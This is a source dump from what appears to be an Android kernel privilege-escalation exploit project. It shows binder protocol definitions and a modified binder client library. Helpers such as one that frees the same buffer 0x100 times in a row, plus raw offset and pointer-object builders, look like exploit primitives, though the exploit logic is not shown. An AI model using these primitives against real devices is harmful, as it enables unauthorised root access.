*/ 295 | __u32 flags; 296 | pid_t sender_pid; 297 | uid_t sender_euid; 298 | binder_size_t data_size; /* number of bytes of data */ 299 | binder_size_t offsets_size; /* number of bytes of offsets */ 300 | 301 | /* If this transaction is inline, the data immediately 302 | * follows here; otherwise, it ends with a pointer to 303 | * the data buffer. 304 | */ 305 | union { 306 | struct { 307 | /* transaction data */ 308 | binder_uintptr_t buffer; 309 | /* offsets from buffer to flat_binder_object structs */ 310 | binder_uintptr_t offsets; 311 | } ptr; 312 | __u8 buf[8]; 313 | } data; 314 | }; 315 | 316 | struct binder_transaction_data_sg { 317 | struct binder_transaction_data transaction_data; 318 | binder_size_t buffers_size; 319 | }; 320 | 321 | struct binder_ptr_cookie { 322 | binder_uintptr_t ptr; 323 | binder_uintptr_t cookie; 324 | }; 325 | 326 | struct binder_handle_cookie { 327 | __u32 handle; 328 | binder_uintptr_t cookie; 329 | } __packed; 330 | 331 | struct binder_pri_desc { 332 | __s32 priority; 333 | __u32 desc; 334 | }; 335 | 336 | struct binder_pri_ptr_cookie { 337 | __s32 priority; 338 | binder_uintptr_t ptr; 339 | binder_uintptr_t cookie; 340 | }; 341 | 342 | enum binder_driver_return_protocol { 343 | BR_ERROR = _IOR('r', 0, __s32), 344 | /* 345 | * int: error code 346 | */ 347 | 348 | BR_OK = _IO('r', 1), 349 | /* No parameters! */ 350 | 351 | BR_TRANSACTION = _IOR('r', 2, struct binder_transaction_data), 352 | BR_REPLY = _IOR('r', 3, struct binder_transaction_data), 353 | /* 354 | * binder_transaction_data: the received command. 355 | */ 356 | 357 | BR_ACQUIRE_RESULT = _IOR('r', 4, __s32), 358 | /* 359 | * not currently supported 360 | * int: 0 if the last bcATTEMPT_ACQUIRE was not successful. 361 | * Else the remote object has acquired a primary reference. 362 | */ 363 | 364 | BR_DEAD_REPLY = _IO('r', 5), 365 | /* 366 | * The target of the last transaction (either a bcTRANSACTION or 367 | * a bcATTEMPT_ACQUIRE) is no longer with us. No parameters. 368 | */ 369 | 370 | BR_TRANSACTION_COMPLETE = _IO('r', 6), 371 | /* 372 | * No parameters... always refers to the last transaction requested 373 | * (including replies). Note that this will be sent even for 374 | * asynchronous transactions. 375 | */ 376 | 377 | BR_INCREFS = _IOR('r', 7, struct binder_ptr_cookie), 378 | BR_ACQUIRE = _IOR('r', 8, struct binder_ptr_cookie), 379 | BR_RELEASE = _IOR('r', 9, struct binder_ptr_cookie), 380 | BR_DECREFS = _IOR('r', 10, struct binder_ptr_cookie), 381 | /* 382 | * void *: ptr to binder 383 | * void *: cookie for binder 384 | */ 385 | 386 | BR_ATTEMPT_ACQUIRE = _IOR('r', 11, struct binder_pri_ptr_cookie), 387 | /* 388 | * not currently supported 389 | * int: priority 390 | * void *: ptr to binder 391 | * void *: cookie for binder 392 | */ 393 | 394 | BR_NOOP = _IO('r', 12), 395 | /* 396 | * No parameters. Do nothing and examine the next command. It exists 397 | * primarily so that we can replace it with a BR_SPAWN_LOOPER command. 398 | */ 399 | 400 | BR_SPAWN_LOOPER = _IO('r', 13), 401 | /* 402 | * No parameters. The driver has determined that a process has no 403 | * threads waiting to service incoming transactions. When a process 404 | * receives this command, it must spawn a new service thread and 405 | * register it via bcENTER_LOOPER. 
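(A thread spawned this way announces itself with BC_REGISTER_LOOPER, while BC_ENTER_LOOPER is used by threads the application placed into the loop itself; see the command protocol below.)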
406 | */ 407 | 408 | BR_FINISHED = _IO('r', 14), 409 | /* 410 | * not currently supported 411 | * stop threadpool thread 412 | */ 413 | 414 | BR_DEAD_BINDER = _IOR('r', 15, binder_uintptr_t), 415 | /* 416 | * void *: cookie 417 | */ 418 | BR_CLEAR_DEATH_NOTIFICATION_DONE = _IOR('r', 16, binder_uintptr_t), 419 | /* 420 | * void *: cookie 421 | */ 422 | 423 | BR_FAILED_REPLY = _IO('r', 17), 424 | /* 425 | * The last transaction (either a bcTRANSACTION or 426 | * a bcATTEMPT_ACQUIRE) failed (e.g. out of memory). No parameters. 427 | */ 428 | }; 429 | 430 | enum binder_driver_command_protocol { 431 | BC_TRANSACTION = _IOW('c', 0, struct binder_transaction_data), 432 | BC_REPLY = _IOW('c', 1, struct binder_transaction_data), 433 | /* 434 | * binder_transaction_data: the sent command. 435 | */ 436 | 437 | BC_ACQUIRE_RESULT = _IOW('c', 2, __s32), 438 | /* 439 | * not currently supported 440 | * int: 0 if the last BR_ATTEMPT_ACQUIRE was not successful. 441 | * Else you have acquired a primary reference on the object. 442 | */ 443 | 444 | BC_FREE_BUFFER = _IOW('c', 3, binder_uintptr_t), 445 | /* 446 | * void *: ptr to transaction data received on a read 447 | */ 448 | 449 | BC_INCREFS = _IOW('c', 4, __u32), 450 | BC_ACQUIRE = _IOW('c', 5, __u32), 451 | BC_RELEASE = _IOW('c', 6, __u32), 452 | BC_DECREFS = _IOW('c', 7, __u32), 453 | /* 454 | * int: descriptor 455 | */ 456 | 457 | BC_INCREFS_DONE = _IOW('c', 8, struct binder_ptr_cookie), 458 | BC_ACQUIRE_DONE = _IOW('c', 9, struct binder_ptr_cookie), 459 | /* 460 | * void *: ptr to binder 461 | * void *: cookie for binder 462 | */ 463 | 464 | BC_ATTEMPT_ACQUIRE = _IOW('c', 10, struct binder_pri_desc), 465 | /* 466 | * not currently supported 467 | * int: priority 468 | * int: descriptor 469 | */ 470 | 471 | BC_REGISTER_LOOPER = _IO('c', 11), 472 | /* 473 | * No parameters. 474 | * Register a spawned looper thread with the device. 475 | */ 476 | 477 | BC_ENTER_LOOPER = _IO('c', 12), 478 | BC_EXIT_LOOPER = _IO('c', 13), 479 | /* 480 | * No parameters. 481 | * These two commands are sent as an application-level thread 482 | * enters and exits the binder loop, respectively. They are 483 | * used so the binder can have an accurate count of the number 484 | * of looping threads it has available. 485 | */ 486 | 487 | BC_REQUEST_DEATH_NOTIFICATION = _IOW('c', 14, 488 | struct binder_handle_cookie), 489 | /* 490 | * int: handle 491 | * void *: cookie 492 | */ 493 | 494 | BC_CLEAR_DEATH_NOTIFICATION = _IOW('c', 15, 495 | struct binder_handle_cookie), 496 | /* 497 | * int: handle 498 | * void *: cookie 499 | */ 500 | 501 | BC_DEAD_BINDER_DONE = _IOW('c', 16, binder_uintptr_t), 502 | /* 503 | * void *: cookie 504 | */ 505 | 506 | BC_TRANSACTION_SG = _IOW('c', 17, struct binder_transaction_data_sg), 507 | BC_REPLY_SG = _IOW('c', 18, struct binder_transaction_data_sg), 508 | /* 509 | * binder_transaction_data_sg: the sent command.
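Compared to plain BC_TRANSACTION/BC_REPLY, the _SG variants append buffers_size, the total size of the scatter-gather buffers carried as BINDER_TYPE_PTR objects in the transaction.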
510 | */ 511 | }; 512 | 513 | #endif /* _UAPI_LINUX_BINDER_H */ 514 | 515 | -------------------------------------------------------------------------------- /lpe/src/binder.c: -------------------------------------------------------------------------------- 1 | /* Copyright 2008 The Android Open Source Project 2 | */ 3 | 4 | #include <stdio.h> 5 | #include <stdlib.h> 6 | #include <errno.h> 7 | #include <string.h> 8 | #include <fcntl.h> 9 | #include <unistd.h> 10 | #include <inttypes.h> 11 | #include <sys/mman.h> 12 | #include <sys/ioctl.h> 13 | 14 | #include "log.h" 15 | #include "binder.h" 16 | #include "uapi_binder.h" 17 | 18 | #define MAX_BIO_SIZE (1 << 30) 19 | 20 | #define TRACE 0 21 | 22 | void bio_init_from_txn(struct binder_io *io, struct binder_transaction_data *txn); 23 | 24 | #if TRACE 25 | void hexdump(void *_data, size_t len) 26 | { 27 | unsigned char *data = _data; 28 | size_t count; 29 | 30 | for (count = 0; count < len; count++) { 31 | if ((count & 15) == 0) 32 | flog_info(stderr,"%04zu:", count); 33 | flog_info(stderr,"\\x%02x", *data); 34 | // flog_info(stderr," %02x %c", *data, 35 | // (*data < 32) || (*data > 126) ? '.' : *data); 36 | data++; 37 | if ((count & 15) == 15) 38 | flog_info(stderr,"\n"); 39 | } 40 | if ((count & 15) != 0) 41 | flog_info(stderr,"\n"); 42 | } 43 | 44 | void binder_dump_txn(struct binder_transaction_data *txn) 45 | { 46 | struct flat_binder_object *obj; 47 | binder_size_t *offs = (binder_size_t *)(uintptr_t)txn->data.ptr.offsets; 48 | size_t count = txn->offsets_size / sizeof(binder_size_t); 49 | 50 | flog_info(stderr," target %016"PRIx64" cookie %016"PRIx64" code %08x flags %08x\n", 51 | (uint64_t)txn->target.ptr, (uint64_t)txn->cookie, txn->code, txn->flags); 52 | flog_info(stderr," pid %8d uid %8d data %"PRIu64" offs %"PRIu64"\n", 53 | txn->sender_pid, txn->sender_euid, (uint64_t)txn->data_size, (uint64_t)txn->offsets_size); 54 | hexdump((void *)(uintptr_t)txn->data.ptr.buffer, txn->data_size); 55 | while (count--) { 56 | obj = (struct flat_binder_object *) (((char*)(uintptr_t)txn->data.ptr.buffer) + *offs++); 57 | flog_info(stderr," - type %08x flags %08x ptr %016"PRIx64" cookie %016"PRIx64"\n", 58 | obj->hdr.type, obj->flags, (uint64_t)obj->binder, (uint64_t)obj->cookie); 59 | } 60 | } 61 | 62 | #define NAME(n) case n: return #n 63 | const char *cmd_name(uint32_t cmd) 64 | { 65 | switch(cmd) { 66 | NAME(BR_NOOP); 67 | NAME(BR_TRANSACTION_COMPLETE); 68 | NAME(BR_INCREFS); 69 | NAME(BR_ACQUIRE); 70 | NAME(BR_RELEASE); 71 | NAME(BR_DECREFS); 72 | NAME(BR_TRANSACTION); 73 | NAME(BR_REPLY); 74 | NAME(BR_FAILED_REPLY); 75 | NAME(BR_DEAD_REPLY); 76 | NAME(BR_DEAD_BINDER); 77 | default: return "???"; 78 | } 79 | } 80 | #else 81 | #define hexdump(a,b) do{} while (0) 82 | #define binder_dump_txn(txn) do{} while (0) 83 | #endif 84 | 85 | #define NAME(n) case n: return #n 86 | const char *cmd_name(uint32_t cmd) 87 | { 88 | switch(cmd) { 89 | NAME(BR_NOOP); 90 | NAME(BR_TRANSACTION_COMPLETE); 91 | NAME(BR_INCREFS); 92 | NAME(BR_ACQUIRE); 93 | NAME(BR_RELEASE); 94 | NAME(BR_DECREFS); 95 | NAME(BR_TRANSACTION); 96 | NAME(BR_REPLY); 97 | NAME(BR_FAILED_REPLY); 98 | NAME(BR_DEAD_REPLY); 99 | NAME(BR_DEAD_BINDER); 100 | default: return "???"; 101 | } 102 | } 103 | 104 | 105 | #define BIO_F_SHARED 0x01 /* needs to be buffer freed */ 106 | #define BIO_F_OVERFLOW 0x02 /* ran out of space */ 107 | #define BIO_F_IOERROR 0x04 108 | #define BIO_F_MALLOCED 0x08 /* needs to be free()'d */ 109 | 110 | struct binder_state *binder_open(const char* driver, size_t mapsize) 111 | { 112 | struct binder_state *bs; 113 | struct binder_version vers; 114 | 115 | bs =
malloc(sizeof(*bs)); 116 | if (!bs) { 117 | errno = ENOMEM; 118 | return NULL; 119 | } 120 | 121 | bs->fd = open(driver, O_RDWR | O_CLOEXEC); 122 | if (bs->fd < 0) { 123 | log_info("binder: cannot open %s (%s)\n", 124 | driver, strerror(errno)); 125 | goto fail_open; 126 | } 127 | 128 | if ((ioctl(bs->fd, BINDER_VERSION, &vers) == -1) || 129 | (vers.protocol_version != BINDER_CURRENT_PROTOCOL_VERSION)) { 130 | log_info( 131 | "binder: kernel driver version (%d) differs from user space version (%d)\n", 132 | vers.protocol_version, BINDER_CURRENT_PROTOCOL_VERSION); 133 | goto fail_open; 134 | } 135 | 136 | bs->mapsize = mapsize; 137 | bs->mapped = mmap(NULL, mapsize, PROT_READ, MAP_PRIVATE, bs->fd, 0); 138 | if (bs->mapped == MAP_FAILED) { 139 | log_info("binder: cannot map device (%s)\n", 140 | strerror(errno)); 141 | goto fail_map; 142 | } 143 | 144 | return bs; 145 | 146 | fail_map: 147 | close(bs->fd); 148 | fail_open: 149 | free(bs); 150 | return NULL; 151 | } 152 | 153 | void binder_close(struct binder_state *bs) 154 | { 155 | munmap(bs->mapped, bs->mapsize); 156 | close(bs->fd); 157 | free(bs); 158 | } 159 | 160 | int binder_become_context_manager(struct binder_state *bs) 161 | { 162 | return ioctl(bs->fd, BINDER_SET_CONTEXT_MGR, 0); 163 | } 164 | 165 | int binder_write(struct binder_state *bs, void *data, size_t len) 166 | { 167 | struct binder_write_read bwr; 168 | int res; 169 | 170 | bwr.write_size = len; 171 | bwr.write_consumed = 0; 172 | bwr.write_buffer = (uintptr_t) data; 173 | bwr.read_size = 0; 174 | bwr.read_consumed = 0; 175 | bwr.read_buffer = 0; 176 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 177 | if (res < 0) { 178 | log_info("binder_write: ioctl failed (%s)\n", 179 | strerror(errno)); 180 | } 181 | return res; 182 | } 183 | 184 | /* 185 | * This is just sending 0x100 commands to free the buffer in a row, 186 | * saving us a few syscalls. 
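Each entry is simply the 4-byte BC_FREE_BUFFER command code immediately followed by the 8-byte buffer pointer, which is why the struct below is packed.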
187 | */ 188 | void binder_free_buffers(struct binder_state *bs, binder_uintptr_t buffer_to_free) 189 | { 190 | struct free_buf_data { 191 | uint32_t cmd_free; 192 | binder_uintptr_t buffer; 193 | } __attribute__((packed)) ; 194 | 195 | struct free_buf_data data[0x100]; 196 | int i; 197 | 198 | for(i=0; i < 0x100; i++){ 199 | data[i].cmd_free = BC_FREE_BUFFER; 200 | data[i].buffer = buffer_to_free; 201 | } 202 | 203 | binder_write(bs, &data[0], sizeof(data)); 204 | // binder_write(bs, &data[0], sizeof(struct free_buf_data) * 0x10); 205 | 206 | } 207 | 208 | 209 | void binder_free_buffer(struct binder_state *bs, 210 | binder_uintptr_t buffer_to_free) 211 | { 212 | struct { 213 | uint32_t cmd_free; 214 | binder_uintptr_t buffer; 215 | } __attribute__((packed)) data; 216 | data.cmd_free = BC_FREE_BUFFER; 217 | data.buffer = buffer_to_free; 218 | binder_write(bs, &data, sizeof(data)); 219 | } 220 | 221 | void binder_send_reply(struct binder_state *bs, 222 | struct binder_io *reply, 223 | binder_uintptr_t buffer_to_free, 224 | int status) 225 | { 226 | struct { 227 | uint32_t cmd_free; 228 | binder_uintptr_t buffer; 229 | uint32_t cmd_reply; 230 | struct binder_transaction_data txn; 231 | } __attribute__((packed)) data; 232 | 233 | data.cmd_free = BC_FREE_BUFFER; 234 | data.buffer = buffer_to_free; 235 | data.cmd_reply = BC_REPLY; 236 | data.txn.target.ptr = 0; 237 | data.txn.cookie = 0; 238 | data.txn.code = 0; 239 | if (status) { 240 | data.txn.flags = TF_STATUS_CODE; 241 | data.txn.data_size = sizeof(int); 242 | data.txn.offsets_size = 0; 243 | data.txn.data.ptr.buffer = (uintptr_t)&status; 244 | data.txn.data.ptr.offsets = 0; 245 | } else { 246 | data.txn.flags = 0; 247 | data.txn.data_size = reply->data - reply->data0; 248 | data.txn.offsets_size = ((char*) reply->offs) - ((char*) reply->offs0); 249 | data.txn.data.ptr.buffer = (uintptr_t)reply->data0; 250 | data.txn.data.ptr.offsets = (uintptr_t)reply->offs0; 251 | } 252 | binder_write(bs, &data, sizeof(data)); 253 | } 254 | 255 | int binder_parse(struct binder_state *bs, struct binder_io *bio, 256 | uintptr_t ptr, size_t size, binder_handler func) 257 | { 258 | int r = 1; 259 | uintptr_t end = ptr + (uintptr_t) size; 260 | 261 | while (ptr < end) { 262 | uint32_t cmd = *(uint32_t *) ptr; 263 | ptr += sizeof(uint32_t); 264 | #if TRACE 265 | log_info("%s:\n", cmd_name(cmd)); 266 | #endif 267 | switch(cmd) { 268 | case BR_NOOP: 269 | break; 270 | case BR_TRANSACTION_COMPLETE: 271 | break; 272 | case BR_INCREFS: 273 | case BR_ACQUIRE: 274 | case BR_RELEASE: 275 | case BR_DECREFS: 276 | #if TRACE 277 | log_info(" %p, %p\n", (void *)ptr, (void *)(ptr + sizeof(void *))); 278 | #endif 279 | ptr += sizeof(struct binder_ptr_cookie); 280 | break; 281 | case BR_TRANSACTION: { 282 | struct binder_transaction_data *txn = (struct binder_transaction_data *) ptr; 283 | if ((end - ptr) < sizeof(*txn)) { 284 | ALOGE("parse: txn too small!\n"); 285 | return -1; 286 | } 287 | binder_dump_txn(txn); 288 | if (func) { 289 | unsigned rdata[256/4]; 290 | struct binder_io msg; 291 | struct binder_io reply; 292 | int res; 293 | 294 | bio_init(&reply, rdata, sizeof(rdata), 4); 295 | bio_init_from_txn(&msg, txn); 296 | res = func(bs, txn, &msg, &reply); 297 | if (txn->flags & TF_ONE_WAY) { 298 | binder_free_buffer(bs, txn->data.ptr.buffer); 299 | } else { 300 | binder_send_reply(bs, &reply, txn->data.ptr.buffer, res); 301 | } 302 | } 303 | ptr += sizeof(*txn); 304 | break; 305 | } 306 | case BR_REPLY: { 307 | struct binder_transaction_data *txn = (struct 
binder_transaction_data *) ptr; 308 | if ((end - ptr) < sizeof(*txn)) { 309 | ALOGE("parse: reply too small!\n"); 310 | return -1; 311 | } 312 | binder_dump_txn(txn); 313 | if (bio) { 314 | bio_init_from_txn(bio, txn); 315 | bio = 0; 316 | } else { 317 | /* todo FREE BUFFER */ 318 | } 319 | ptr += sizeof(*txn); 320 | r = 0; 321 | break; 322 | } 323 | case BR_DEAD_BINDER: { 324 | struct binder_death *death = (struct binder_death *)(uintptr_t) *(binder_uintptr_t *)ptr; 325 | ptr += sizeof(binder_uintptr_t); 326 | death->func(bs, death->ptr); 327 | break; 328 | } 329 | case BR_FAILED_REPLY: 330 | r = -1; 331 | break; 332 | case BR_DEAD_REPLY: 333 | r = -1; 334 | break; 335 | default: 336 | ALOGE("parse: OOPS %d\n", cmd); 337 | return -1; 338 | } 339 | } 340 | 341 | return r; 342 | } 343 | 344 | void binder_acquire(struct binder_state *bs, uint32_t target) 345 | { 346 | uint32_t cmd[2]; 347 | cmd[0] = BC_ACQUIRE; 348 | cmd[1] = target; 349 | binder_write(bs, cmd, sizeof(cmd)); 350 | } 351 | 352 | void binder_release(struct binder_state *bs, uint32_t target) 353 | { 354 | uint32_t cmd[2]; 355 | cmd[0] = BC_RELEASE; 356 | cmd[1] = target; 357 | binder_write(bs, cmd, sizeof(cmd)); 358 | } 359 | 360 | void binder_link_to_death(struct binder_state *bs, uint32_t target, struct binder_death *death) 361 | { 362 | struct { 363 | uint32_t cmd; 364 | struct binder_handle_cookie payload; 365 | } __attribute__((packed)) data; 366 | 367 | data.cmd = BC_REQUEST_DEATH_NOTIFICATION; 368 | data.payload.handle = target; 369 | data.payload.cookie = (uintptr_t) death; 370 | binder_write(bs, &data, sizeof(data)); 371 | } 372 | 373 | int binder_call(struct binder_state *bs, 374 | struct binder_io *msg, struct binder_io *reply, 375 | uint32_t target, uint32_t code) { 376 | 377 | return binder_call2(bs, msg, reply, target, code, NULL); 378 | 379 | } 380 | 381 | int binder_call2(struct binder_state *bs, 382 | struct binder_io *msg, struct binder_io *reply, 383 | uint32_t target, uint32_t code, char *buffer) 384 | { 385 | int res; 386 | struct binder_write_read bwr; 387 | struct { 388 | uint32_t cmd; 389 | struct binder_transaction_data txn; 390 | } __attribute__((packed)) writebuf; 391 | unsigned readbuf[32]; 392 | 393 | if (msg->flags & BIO_F_OVERFLOW) { 394 | log_info("binder: txn buffer overflow\n"); 395 | goto fail; 396 | } 397 | 398 | writebuf.cmd = BC_TRANSACTION; 399 | writebuf.txn.target.handle = target; 400 | writebuf.txn.code = code; 401 | writebuf.txn.flags = 0; 402 | writebuf.txn.data_size = msg->data - msg->data0; 403 | writebuf.txn.offsets_size = ((char*) msg->offs) - ((char*) msg->offs0); 404 | writebuf.txn.data.ptr.buffer = (uintptr_t)msg->data0; 405 | writebuf.txn.data.ptr.offsets = (uintptr_t)msg->offs0; 406 | 407 | bwr.write_size = sizeof(writebuf); 408 | bwr.write_consumed = 0; 409 | bwr.write_buffer = (uintptr_t) &writebuf; 410 | bwr.read_size = 0; 411 | bwr.read_consumed = 0; 412 | bwr.read_buffer = 0; 413 | 414 | // log_err("---------------- writebuf -------------\n"); 415 | // hexdump(&writebuf, sizeof(writebuf)); 416 | // log_err("---------------- Data -------------\n"); 417 | // hexdump(msg->data0, msg->data - msg->data0); 418 | // log_err("---------------- Offsets -------------\n"); 419 | // hexdump(msg->offs0, writebuf.txn.offsets_size); 420 | // log_err("IOCTL CODE: %x\n", BINDER_WRITE_READ); 421 | // log_err("DATA PTR: %p\n", msg->data0); 422 | // log_err("OFFS PTR: %p\n", msg->offs0); 423 | 424 | // log_err("---------------- bwr ------------------\n"); 425 | // hexdump(&bwr, sizeof(bwr)); 
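/* The transaction is consumed by the first BINDER_WRITE_READ ioctl below;
 * later iterations only read, until binder_parse() returns 0 on a BR_REPLY
 * or a negative value on failure. */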
426 | 427 | for (;;) { 428 | uintptr_t thereadbuf = (buffer) ? (uintptr_t)buffer : (uintptr_t)readbuf; 429 | bwr.read_size = sizeof(readbuf); 430 | bwr.read_consumed = 0; 431 | bwr.read_buffer = thereadbuf; 432 | 433 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 434 | 435 | if (res < 0) { 436 | log_info("binder: ioctl failed (%s)\n", strerror(errno)); 437 | goto fail; 438 | } 439 | 440 | res = binder_parse(bs, reply, (uintptr_t) thereadbuf, bwr.read_consumed, 0); 441 | if (res == 0) return 0; 442 | if (res < 0) goto fail; 443 | } 444 | 445 | fail: 446 | memset(reply, 0, sizeof(*reply)); 447 | reply->flags |= BIO_F_IOERROR; 448 | return -1; 449 | } 450 | 451 | int binder_call3(struct binder_state *bs, 452 | struct binder_io *msg, struct binder_io *reply, 453 | uint32_t target, uint32_t code, char *buffer) 454 | { 455 | int res; 456 | struct binder_write_read bwr; 457 | struct { 458 | uint32_t cmd; 459 | struct binder_transaction_data txn; 460 | } __attribute__((packed)) writebuf; 461 | unsigned readbuf[32]; 462 | 463 | if (msg->flags & BIO_F_OVERFLOW) { 464 | log_info("binder: txn buffer overflow\n"); 465 | goto fail; 466 | } 467 | 468 | writebuf.cmd = BC_TRANSACTION; 469 | writebuf.txn.target.handle = target; 470 | writebuf.txn.code = code; 471 | writebuf.txn.flags = 0; 472 | writebuf.txn.data_size = msg->data - msg->data0; 473 | writebuf.txn.offsets_size = ((char*) msg->offs) - ((char*) msg->offs0); 474 | writebuf.txn.data.ptr.buffer = (uintptr_t)msg->data0; 475 | writebuf.txn.data.ptr.offsets = (uintptr_t)msg->offs0; 476 | 477 | bwr.write_size = sizeof(writebuf); 478 | bwr.write_consumed = 0; 479 | bwr.write_buffer = (uintptr_t) &writebuf; 480 | bwr.read_size = 0; 481 | bwr.read_consumed = 0; 482 | bwr.read_buffer = 0; 483 | 484 | // log_err("---------------- writebuf -------------\n"); 485 | // hexdump(&writebuf, sizeof(writebuf)); 486 | // log_err("---------------- Data -------------\n"); 487 | // hexdump(msg->data0, msg->data - msg->data0); 488 | // log_err("---------------- Offsets -------------\n"); 489 | // hexdump(msg->offs0, writebuf.txn.offsets_size); 490 | // log_err("IOCTL CODE: %x\n", BINDER_WRITE_READ); 491 | // log_err("DATA PTR: %p\n", msg->data0); 492 | // log_err("OFFS PTR: %p\n", msg->offs0); 493 | 494 | // log_err("---------------- bwr ------------------\n"); 495 | // hexdump(&bwr, sizeof(bwr)); 496 | 497 | for (;;) { 498 | uintptr_t thereadbuf = (buffer) ? 
(uintptr_t)buffer : (uintptr_t)readbuf; 499 | bwr.read_size = sizeof(readbuf); 500 | bwr.read_consumed = 0; 501 | bwr.read_buffer = thereadbuf; 502 | 503 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 504 | 505 | if (res < 0) { 506 | log_info("binder: ioctl failed (%s)\n", strerror(errno)); 507 | goto fail; 508 | } 509 | 510 | res = binder_parse(bs, reply, (uintptr_t) thereadbuf, bwr.read_consumed, 0); 511 | if (res == 0) return 0; 512 | if (res < 0) goto fail; 513 | } 514 | 515 | fail: 516 | memset(reply, 0, sizeof(*reply)); 517 | reply->flags |= BIO_F_IOERROR; 518 | return -1; 519 | } 520 | 521 | 522 | void binder_loop(struct binder_state *bs, binder_handler func) 523 | { 524 | int res; 525 | struct binder_write_read bwr; 526 | uint32_t readbuf[32]; 527 | 528 | bwr.write_size = 0; 529 | bwr.write_consumed = 0; 530 | bwr.write_buffer = 0; 531 | 532 | readbuf[0] = BC_ENTER_LOOPER; 533 | binder_write(bs, readbuf, sizeof(uint32_t)); 534 | 535 | for (;;) { 536 | bwr.read_size = sizeof(readbuf); 537 | bwr.read_consumed = 0; 538 | bwr.read_buffer = (uintptr_t) readbuf; 539 | 540 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 541 | 542 | if (res < 0) { 543 | ALOGE("binder_loop: ioctl failed (%s)\n", strerror(errno)); 544 | break; 545 | } 546 | 547 | res = binder_parse(bs, 0, (uintptr_t) readbuf, bwr.read_consumed, func); 548 | if (res == 0) { 549 | ALOGE("binder_loop: unexpected reply?!\n"); 550 | break; 551 | } 552 | if (res < 0) { 553 | ALOGE("binder_loop: io error %d %s\n", res, strerror(errno)); 554 | break; 555 | } 556 | } 557 | } 558 | 559 | void binder_handle_transaction(struct binder_state *bs, binder_handler func) 560 | { 561 | int res; 562 | struct binder_write_read bwr; 563 | uint32_t readbuf[32]; 564 | 565 | bwr.write_size = 0; 566 | bwr.write_consumed = 0; 567 | bwr.write_buffer = 0; 568 | 569 | readbuf[0] = BC_ENTER_LOOPER; 570 | binder_write(bs, readbuf, sizeof(uint32_t)); 571 | 572 | bwr.read_size = sizeof(readbuf); 573 | bwr.read_consumed = 0; 574 | bwr.read_buffer = (uintptr_t) readbuf; 575 | 576 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 577 | 578 | if (res < 0) { 579 | ALOGE("binder_loop: ioctl failed (%s)\n", strerror(errno)); 580 | return; 581 | } 582 | 583 | res = binder_parse(bs, 0, (uintptr_t) readbuf, bwr.read_consumed, func); 584 | if (res == 0) { 585 | ALOGE("binder_loop: unexpected reply?!\n"); 586 | return; 587 | } 588 | if (res < 0) { 589 | ALOGE("binder_loop: io error %d %s\n", res, strerror(errno)); 590 | return; 591 | } 592 | } 593 | 594 | 595 | void bio_init_from_txn(struct binder_io *bio, struct binder_transaction_data *txn) 596 | { 597 | bio->data = bio->data0 = (char *)(intptr_t)txn->data.ptr.buffer; 598 | bio->offs = bio->offs0 = (binder_size_t *)(intptr_t)txn->data.ptr.offsets; 599 | bio->data_avail = txn->data_size; 600 | bio->offs_avail = txn->offsets_size / sizeof(size_t); 601 | bio->flags = BIO_F_SHARED; 602 | 603 | } 604 | 605 | void bio_init(struct binder_io *bio, void *data, 606 | size_t maxdata, size_t maxoffs) 607 | { 608 | size_t n = maxoffs * sizeof(size_t); 609 | 610 | if (n > maxdata) { 611 | bio->flags = BIO_F_OVERFLOW; 612 | bio->data_avail = 0; 613 | bio->offs_avail = 0; 614 | return; 615 | } 616 | 617 | bio->data = bio->data0 = (char *) data + n; 618 | bio->offs = bio->offs0 = data; 619 | bio->data_avail = maxdata - n; 620 | bio->offs_avail = maxoffs; 621 | bio->flags = 0; 622 | } 623 | 624 | void *bio_alloc(struct binder_io *bio, size_t size) 625 | { 626 | size = (size + 3) & (~3); 627 | if (size > bio->data_avail) { 628 | 
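/* Out of space in the work buffer: record the overflow and fail the allocation. */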
bio->flags |= BIO_F_OVERFLOW; 629 | return NULL; 630 | } else { 631 | void *ptr = bio->data; 632 | bio->data += size; 633 | bio->data_avail -= size; 634 | return ptr; 635 | } 636 | } 637 | 638 | void binder_done(struct binder_state *bs, 639 | struct binder_io *msg, 640 | struct binder_io *reply) 641 | { 642 | struct { 643 | uint32_t cmd; 644 | uintptr_t buffer; 645 | } __attribute__((packed)) data; 646 | 647 | if (reply->flags & BIO_F_SHARED) { 648 | data.cmd = BC_FREE_BUFFER; 649 | data.buffer = (uintptr_t) reply->data0; 650 | binder_write(bs, &data, sizeof(data)); 651 | reply->flags = 0; 652 | } 653 | } 654 | 655 | static struct flat_binder_object *bio_alloc_obj(struct binder_io *bio) 656 | { 657 | struct flat_binder_object *obj; 658 | 659 | obj = bio_alloc(bio, sizeof(*obj)); 660 | 661 | if (obj && bio->offs_avail) { 662 | bio->offs_avail--; 663 | *bio->offs++ = ((char*) obj) - ((char*) bio->data0); 664 | return obj; 665 | } 666 | 667 | bio->flags |= BIO_F_OVERFLOW; 668 | return NULL; 669 | } 670 | 671 | void bio_put_uint32(struct binder_io *bio, uint32_t n) 672 | { 673 | uint32_t *ptr = bio_alloc(bio, sizeof(n)); 674 | if (ptr) 675 | *ptr = n; 676 | } 677 | 678 | void bio_put_obj(struct binder_io *bio, void *ptr) 679 | { 680 | struct flat_binder_object *obj; 681 | 682 | obj = bio_alloc_obj(bio); 683 | if (!obj) 684 | return; 685 | 686 | obj->flags = 0x7f | FLAT_BINDER_FLAG_ACCEPTS_FDS; 687 | obj->hdr.type = BINDER_TYPE_BINDER; 688 | obj->binder = (uintptr_t)ptr; 689 | obj->cookie = 0; 690 | } 691 | 692 | void bio_put_weak_obj(struct binder_io *bio, void *ptr) 693 | { 694 | struct flat_binder_object *obj; 695 | 696 | obj = bio_alloc_obj(bio); 697 | if (!obj) 698 | return; 699 | 700 | obj->flags = 0x7f | FLAT_BINDER_FLAG_ACCEPTS_FDS; 701 | obj->hdr.type = BINDER_TYPE_WEAK_BINDER; 702 | obj->binder = (uintptr_t)ptr; 703 | obj->cookie = 0; 704 | 705 | 706 | } 707 | 708 | 709 | /* Add an offset to the list. */ 710 | void bio_add_offset(struct binder_io *bio, uint64_t offset) 711 | { 712 | if (!bio->offs_avail) 713 | return; 714 | bio->offs_avail--; 715 | *bio->offs++ = offset; 716 | } 717 | 718 | /* Create a BINDER_TYPE_PTR object, which will contain arbitrary data. This can for example 719 | * be used to contain an array of file descriptors as used by BINDER_TYPE_FDA, which 720 | * references the array within the BINDER_TYPE_PTR object. 721 | * The function returns a pointer to the allocated data, so that it can be set. If the 